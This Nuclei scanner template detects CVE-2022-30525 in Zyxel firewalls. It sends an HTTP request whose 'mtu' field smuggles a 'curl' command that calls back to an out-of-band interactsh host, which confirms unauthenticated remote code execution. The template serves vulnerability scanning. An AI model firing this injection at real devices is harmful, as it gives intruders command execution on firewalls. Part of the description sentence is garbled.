nuclei-templates/cves/2022/CVE-2022-30525.yaml

34 lines
1.2 KiB
YAML

id: CVE-2022-30525
info:
name: Zyxel Firewall - Unauthenticated RCE
author: h1ei1,prajiteshsingh
severity: critical
description: |
The vulnerability affects Zyxel firewalls that support Zero Touch Provisioning (ZTP), including the ATP Series, VPN Series, and USG FLEX Series (including USG20-VPN and USG20W-VPN), allowing an unauthenticated remote attacker to target the affected device as nobody Execute arbitrary code as a user on.
reference:
- https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
- https://github.com/rapid7/metasploit-framework/pull/16563
- https://nvd.nist.gov/vuln/detail/CVE-2022-30525
tags: rce,zyxel,cve,cve2022,firewall,unauth
requests:
- raw:
- |
POST /ztp/cgi-bin/handler HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{interactsh-url}};","data":"hi"}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: status
status:
- 500